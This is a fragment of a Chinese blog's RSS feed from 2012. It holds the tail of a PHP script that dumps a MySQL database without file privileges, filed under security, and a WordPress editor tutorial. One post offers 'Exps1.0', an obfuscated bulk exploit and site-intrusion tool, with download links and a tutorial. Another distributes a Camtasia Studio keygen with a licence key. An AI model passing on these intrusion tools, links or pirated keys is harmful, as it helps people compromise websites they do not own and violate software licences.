&lt;span style=&quot;color: #990000;&quot;&gt;fputs&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$mysql&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #990000;&quot;&gt;fclose&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #b1b100;&quot;&gt;echo&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&amp;lt;br&amp;gt;&amp;lt;center&amp;gt;数据备份成功，数据库文件：&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$filename&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&amp;lt;/center&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/607978829/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_20/4070/php-mysql-backup-database.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_20/4070/php-mysql-backup-database.jsp/feed</wfw:commentRss><slash:comments>0</slash:comments><description>说明：使用fopen()函数，不需要select into outfile，所以不需file_priv为Y。填写好数据库，保存为xx.php访问一下即可 程序代码： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 &amp;#60;?php //blackbap.org $mysql_servername = &amp;#34;localhost&amp;#34;;//数据库服务器 $mysql_username = &amp;#34;user&amp;#34;;//数据库登陆账户 $mysql_password =&amp;#34;pass&amp;#34;;//数据库登陆密码 $mysql_database =&amp;#34;dataname&amp;#34;;//数据库名称 $mysql_link=@mysql_connect&amp;#40;$mysql_servername , [...]&lt;img src=&quot;http://www1.feedsky.com/t1/607978829/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_20/4070/php-mysql-backup-database.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>SQL</category><category>php</category><category>安全相关</category><category>MySQL</category><category>数据库</category><pubDate>Mon, 20 Feb 2012 23:58:05 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_20/4070/php-mysql-backup-database.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4070</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_20/4070/php-mysql-backup-database.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/607978829/6370047</fs:itemid></item><item><title>Exps1.0 EXP批量抓站工具</title><link>http://www.uedbox.com/2012_02_20/4062/exp-bulk-intrusion-tools.jsp</link><content:encoded>&lt;p&gt;没啥说的，很多玩量的必须要收藏的好东西，花了几天修改，还有啥BUG的告诉我,QQ:413783480&lt;/p&gt;
&lt;p&gt;附图一张&lt;br /&gt;
&lt;img class=&quot;alignright size-full wp-image-4063&quot; title=&quot;exp tools&quot; src=&quot;http://www.uedbox.com/wp-content/uploads/2012/02/20120220191918.jpg&quot; alt=&quot;&quot; width=&quot;457&quot; height=&quot;235&quot; /&gt;&lt;/p&gt;
&lt;p&gt;代码加密了，你们想改名字的就要费心思了&lt;/p&gt;
&lt;p&gt;下载地址:9&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://115.com/file/an9bes8z#&quot; target=&quot;_blank&quot;&gt;http://115.com/file/an9bes8z#&lt;/a&gt;&lt;br /&gt;
Exps_1.0_.rar&lt;/p&gt;
&lt;p&gt;使用教程(提议先看使用视频)&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://115.com/file/dplswbdk#&quot; target=&quot;_blank&quot;&gt;http://115.com/file/dplswbdk#&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;exps_1.0_使用.rar&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/607939735/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_20/4062/exp-bulk-intrusion-tools.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_20/4062/exp-bulk-intrusion-tools.jsp/feed</wfw:commentRss><slash:comments>0</slash:comments><description>没啥说的，很多玩量的必须要收藏的好东西，花了几天修改，还有啥BUG的告诉我,QQ:413783480 附图一张 代码加密了，你们想改名字的就要费心思了 下载地址:9 http://115.com/file/an9bes8z# Exps_1.0_.rar 使用教程(提议先看使用视频) http://115.com/file/dplswbdk# exps_1.0_使用.rar&lt;img src=&quot;http://www1.feedsky.com/t1/607939735/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_20/4062/exp-bulk-intrusion-tools.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>安全相关</category><category>exp</category><category>木马</category><category>安全工具</category><pubDate>Mon, 20 Feb 2012 19:20:58 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_20/4062/exp-bulk-intrusion-tools.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4062</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_20/4062/exp-bulk-intrusion-tools.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/607939735/6370047</fs:itemid></item><item><title>camtasia studio7.1注册码(注册机)</title><link>http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp</link><content:encoded>&lt;p&gt;《Camtasia屏幕录像大师》(TechSmith Camtasia Studio)更新v7.1.1/含注册机[压缩包]&lt;/p&gt;
&lt;p&gt;&lt;a title=&quot;camtasia studio7.1注册码(注册机)&quot; href=&quot;http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp&quot;&gt;Camtasia Studio 7.1注册码&lt;/a&gt;&lt;br /&gt;
&lt;a title=&quot;camtasia studio7.1注册码(注册机)&quot; href=&quot;http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp&quot;&gt; Camtasia Studio 7.1注册机&lt;/a&gt;&lt;br /&gt;
&lt;a title=&quot;camtasia studio7.1注册码(注册机)&quot; href=&quot;http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp&quot;&gt; Camtasia Studio 7注册码&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;中文名: Camtasia屏幕录像大师&lt;br /&gt;
英文名: TechSmith &lt;a title=&quot;camtasia studio7.1注册码(注册机)&quot; href=&quot;http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp&quot;&gt;Camtasia Studio&lt;/a&gt;&lt;br /&gt;
资源格式: 压缩包&lt;br /&gt;
版本: 更新v7.1.1/含注册机&lt;br /&gt;
发行时间: 2012年&lt;br /&gt;
制作发行: TechSmith Corporation&lt;br /&gt;
地区: 美国&lt;br /&gt;
语言: 英文&lt;br /&gt;
简介:&lt;/p&gt;
&lt;p&gt;网站链接： http://www.techsmith.com/camtasia/&lt;br /&gt;
软件介绍：&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;aligncenter size-full wp-image-4051&quot; title=&quot;camtasia Studio7 注册码&quot; src=&quot;http://www.uedbox.com/wp-content/uploads/2012/02/camtasia.jpg&quot; alt=&quot;&quot; width=&quot;390&quot; height=&quot;436&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;a title=&quot;camtasia studio7.1注册码(注册机)&quot; href=&quot;http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp&quot;&gt;Camtasia Studio&lt;/a&gt;是TechSmith旗下一款专门录制屏幕动作的工具，它能在任何颜色模式下轻松地记录屏幕动作，包括影像、音效、鼠标移动轨迹、解说声音等等，另外，它还具有及时播放和编辑压缩的功能，可对视频片段进行剪接、添加转场效果。&lt;/p&gt;
&lt;p&gt;它输出的文件格式很多，包括MP4、AVI、WMV、M4V、CAMV、MOV、RM、GIF动画等多种常见格式，是制作视频演示的绝佳工具。 TechSmith还专门对Codec进行开发，研究开发了属于自己的一套压缩编码算法，叫做&quot;TSCC&quot; (TechSmith Screen Capture Codec)，专门用于对动态影像的编码！&lt;/p&gt;
&lt;p&gt;与简单易用的 DemoCreator 相比，&lt;a title=&quot;camtasia studio7.1注册码(注册机)&quot; href=&quot;http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp&quot;&gt;Camtasia Studio&lt;/a&gt;显得更为专业，可控性更多，支持输出的格式也多，尤其是它的编辑功能，可以编辑音频、缩放局部画面、插图、设置过渡效果及画中画效果等等，很有特色，且支持录制PowerPoint。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;下载地址：&lt;/strong&gt;&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;ed2k://|file|%5BCamtasia%E5%B1%8F%E5%B9%95%E5%BD%95%E5%83%8F%E5%A4%A7%E5%B8%88%5D.Camtasia.Studio.v7.1.0.1631.Incl.Keygen-MESMERiZE.zip|179466515|8b762aab4de7921f78033ff2fe8d8779|h=y7c72qhiqq5vuubmy46dcshtn5xl3ksl|/&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;安装方法：&lt;/strong&gt;把一大堆压缩包解压到一个文件夹里，之后点击mesmerize.r00，解压里面的Camtasia.msi即可安装！注册机在mesmerize.rar里！&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;或者您也可单独下载注册机程序：&lt;a title=&quot;camtasia studio7注册机&quot; href=&quot;http://www.uedbox.com/wp-content/uploads/2012/02/Camtasia.Studio.keygen.zip&quot;&gt;Camtasia.Studio.keygen.zip&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;上边的包内含有注册机，或直接使用下边的注册码&lt;br /&gt;
&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;Name：&lt;/span&gt;www.uedbox.com&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt; key：&lt;/span&gt;9CRAA-5WCCL-H89Z8-88G2M-7R9B4&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/607593904/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp/feed</wfw:commentRss><slash:comments>0</slash:comments><description>《Camtasia屏幕录像大师》(TechSmith Camtasia Studio)更新v7.1.1/含注册机[压缩包] Camtasia Studio 7.1注册码 Camtasia Studio 7.1注册机 Camtasia Studio 7注册码 中文名: Camtasia屏幕录像大师 英文名: TechSmith Camtasia Studio 资源格式: 压缩包 版本: 更新v7.1.1/含注册机 发行时间: 2012年 制作发行: TechSmith Corporation 地区: 美国 语言: 英文 简介: 网站链接： http://www.techsmith.com/camtasia/ 软件介绍： Camtasia Studio是TechSmith旗下一款专门录制屏幕动作的工具，它能在任何颜色模式下轻松地记录屏幕动作，包括影像、音效、鼠标移动轨迹、解说声音等等，另外，它还具有及时播放和编辑压缩的功能，可对视频片段进行剪接、添加转场效果。 它输出的文件格式很多，包括MP4、AVI、WMV、M4V、CAMV、MOV、RM、GIF动画等多种常见格式，是制作视频演示的绝佳工具。 TechSmith还专门对Codec进行开发，研究开发了属于自己的一套压缩编码算法，叫做&quot;TSCC&quot; (TechSmith Screen Capture Codec)，专门用于对动态影像的编码！ 与简单易用的 DemoCreator 相比，Camtasia Studio显得更为专业，可控性更多，支持输出的格式也多，尤其是它的编辑功能，可以编辑音频、缩放局部画面、插图、设置过渡效果及画中画效果等等，很有特色，且支持录制PowerPoint。 下载地址： ed2k://&amp;#124;file&amp;#124;%5BCamtasia%E5%B1%8F%E5%B9%95%E5%BD%95%E5%83%8F%E5%A4%A7%E5%B8%88%5D.Camtasia.Studio.v7.1.0.1631.Incl.Keygen-MESMERiZE.zip&amp;#124;179466515&amp;#124;8b762aab4de7921f78033ff2fe8d8779&amp;#124;h=y7c72qhiqq5vuubmy46dcshtn5xl3ksl&amp;#124;/ 安装方法：把一大堆压缩包解压到一个文件夹里，之后点击mesmerize.r00，解压里面的Camtasia.msi即可安装！注册机在mesmerize.rar里！ 或者您也可单独下载注册机程序：Camtasia.Studio.keygen.zip 上边的包内含有注册机，或直接使用下边的注册码 Name：www.uedbox.com key：9CRAA-5WCCL-H89Z8-88G2M-7R9B4 &amp;#160;&lt;img src=&quot;http://www1.feedsky.com/t1/607593904/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>camtasia studio keygen</category><category>camtasia studio license</category><category>camtasia studio key</category><category>camtasia studio 注册码</category><category>破解</category><category>Crack</category><pubDate>Sun, 19 Feb 2012 17:30:15 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4050</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_19/4050/camtasia-studio7-license.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/607593904/6370047</fs:itemid></item><item><title>wp-codebox添加后台按钮</title><link>http://www.uedbox.com/2012_02_14/4040/wp-codebox-add-button.jsp</link><content:encoded>&lt;p&gt;&lt;strong&gt;修改步骤：&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;１、在插入代码前，将wordpress 编辑器切换为“HTML编辑”模式；&lt;br /&gt;
２、因为在 Pre 标签里再贴 Pre 标签就会出问题，所以请将本站实例代码中的 xpre 替换为 pre；&lt;br /&gt;
３、 Lang=”&quot; 这里可以修改为你喜欢的语言，当然先留空到时候再填也可以；&lt;br /&gt;
４、修改 wp-includes/js/quicktags.js 这个文件;&lt;/p&gt;
&lt;p&gt;先找到这句代码&lt;/p&gt;

&lt;div class=&quot;wp_codebox&quot;&gt;&lt;table&gt;&lt;tr id=&quot;p40407&quot;&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; id=&quot;p4040code7&quot;&gt;&lt;pre class=&quot;javascript&quot; style=&quot;font-family:monospace;&quot;&gt;edButtons&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;edButtons.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; edButton&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ed_code&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;code&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;&amp;lt;code&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;&amp;lt;/code&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;c&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;span id=&quot;more-4040&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;然后再上面代码后面添加下面代码&lt;/p&gt;

&lt;div class=&quot;wp_codebox&quot;&gt;&lt;table&gt;&lt;tr id=&quot;p40408&quot;&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
2
3
4
5
6
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; id=&quot;p4040code8&quot;&gt;&lt;pre class=&quot;javascript&quot; style=&quot;font-family:monospace;&quot;&gt;edButtons&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;edButtons.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;
&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; edButton&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ed_pre_php&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;pre_php&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;p&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,-&lt;/span&gt;&lt;span style=&quot;color: #CC0000;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
edButtons&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;edButtons.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;
&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; edButton&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ed_pre_css&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;pre_css&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;pp&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,-&lt;/span&gt;&lt;span style=&quot;color: #CC0000;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
edButtons&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;edButtons.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;
&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; edButton&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ed_pre_js&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;pre_js&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ppp&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,-&lt;/span&gt;&lt;span style=&quot;color: #CC0000;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;再找到这句代码&lt;/p&gt;

&lt;div class=&quot;wp_codebox&quot;&gt;&lt;table&gt;&lt;tr id=&quot;p40409&quot;&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; id=&quot;p4040code9&quot;&gt;&lt;pre class=&quot;javascript&quot; style=&quot;font-family:monospace;&quot;&gt;j.&lt;span style=&quot;color: #660066;&quot;&gt;Buttons&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;j.&lt;span style=&quot;color: #660066;&quot;&gt;Buttons&lt;/span&gt;.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; edButton&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;a&lt;span style=&quot;color: #339933;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;_code&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;code&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;&amp;lt;code&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;&amp;lt;/code&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;c&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;再在上面代码下面添加以下代码&lt;/p&gt;

&lt;div class=&quot;wp_codebox&quot;&gt;&lt;table&gt;&lt;tr id=&quot;p404010&quot;&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
2
3
4
5
6
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; id=&quot;p4040code10&quot;&gt;&lt;pre class=&quot;javascript&quot; style=&quot;font-family:monospace;&quot;&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;j.&lt;span style=&quot;color: #660066;&quot;&gt;Buttons&lt;/span&gt;.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;
    &lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; edButton&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ed_pre_php&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;pre_php&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;&amp;lt;xpre lang='php' line='1' file='code.txt' colla='+'&amp;gt;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;lt;/xpre&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;p&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;&lt;span style=&quot;color: #CC0000;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    j.&lt;span style=&quot;color: #660066;&quot;&gt;Buttons&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;j.&lt;span style=&quot;color: #660066;&quot;&gt;Buttons&lt;/span&gt;.&lt;span style=&quot;color: #660066;&quot;&gt;length&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt;
    &lt;span style=&quot;color: #003366; font-weight: bold;&quot;&gt;new&lt;/span&gt; edButton&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;ed_pre_css&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;pre_css&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;&amp;lt;xpre lang='css' line='1' file='code.txt' colla='+'&amp;gt;n&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;n&amp;lt;/xpre&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #3366CC;&quot;&gt;&amp;quot;pp&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt;&lt;span style=&quot;color: #CC0000;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
